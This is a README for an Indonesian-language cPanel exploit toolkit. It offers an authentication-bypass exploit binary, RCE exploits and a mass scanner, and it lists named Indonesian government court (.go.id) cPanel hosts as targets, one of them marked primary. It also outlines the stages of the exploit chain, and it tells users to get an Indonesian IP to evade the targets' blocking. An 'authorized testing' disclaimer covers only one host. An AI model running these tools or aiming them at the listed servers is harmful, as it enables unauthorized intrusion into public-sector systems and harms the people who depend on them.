🦉 Indo cPanel Exploit Toolkit

⚠️ FOR AUTHORIZED SECURITY TESTING ONLY

Tools dan exploit untuk authorized penetration testing terhadap infrastruktur pemerintah Indonesia (.go.id). Hanya gunakan dengan izin tertulis.

Quick Install

# Clone repo
git clone https://github.com/dikurdikur/indo-cpanel-exploit.git
cd indo-cpanel-exploit

# Run setup
./scripts/setup.sh

Or download pre-built binary:

wget https://github.com/dikurdikur/indo-cpanel-exploit/releases/latest/download/cve-2026-41940
chmod +x cve-2026-41940
./cve-2026-41940 -u cpanel.target.go.id -p 2087

Requirements

• Go 1.21+ (untuk compile exploit)
• curl, wget, git
• IP Indonesia (wajib — target memblokir IP luar)

Tools Included

Tool	Deskripsi
CVE-2026-41940	cPanel WHM Auth Bypass via CRLF Injection
CVE-2023-29489	cPanel XSS → RCE
cpanel-scanner	Multi-target cPanel vulnerability scanner
softploit	Softaculous RCE exploit

Targets

15+ cPanel exposed di domain pemerintah Indonesia:

• cpanel.pa-banjarkota.go.id ← PRIMARY TARGET
• cpanel.pa-bandung.go.id
• cpanel.pa-bogor.go.id
• cpanel.pa-ciamis.go.id
• cpanel.pa-cianjur.go.id
• ... (lihat reports/cpanel_targets.txt)

Usage

1. Scan single target

./exploits/cve-2026-41940/cve-2026-41940 -u https://cpanel.target.go.id:2087

2. Scan all targets

./scripts/scan_all.sh

3. Generate report

./scripts/generate_report.sh

CVE-2026-41940 Exploit Chain

Stage 1: Mint preauth session → POST /login/?login_only=1
Stage 2: CRLF injection → GET / + Authorization: Basic <CRLF_PAYLOAD>
Stage 3: Propagate → /scripts2/listaccts
Stage 4: Verify root → /cpsess<TOKEN>/json-api/version

Authorized Targets

• ✅ pa-banjarkota.go.id (izin: 6 Mei - 10 Juni 2026)
• Target lain: sesuaikan scope dan izin

Disclaimer

Tools ini dibuat untuk tujuan keamanan yang sah (authorized testing & responsible disclosure). Penggunaan tanpa izin adalah pelanggaran hukum.